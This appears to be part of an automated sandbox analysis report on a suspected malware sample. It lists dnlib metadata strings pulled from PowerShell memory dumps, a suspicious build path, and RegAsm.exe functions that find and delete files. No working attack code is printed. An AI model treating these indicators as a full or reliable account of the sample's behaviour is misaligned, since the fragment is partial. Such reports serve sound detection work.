                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.377387252.0000000006470000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.375410076.0000000003509000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,9_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,9_2_0041C322
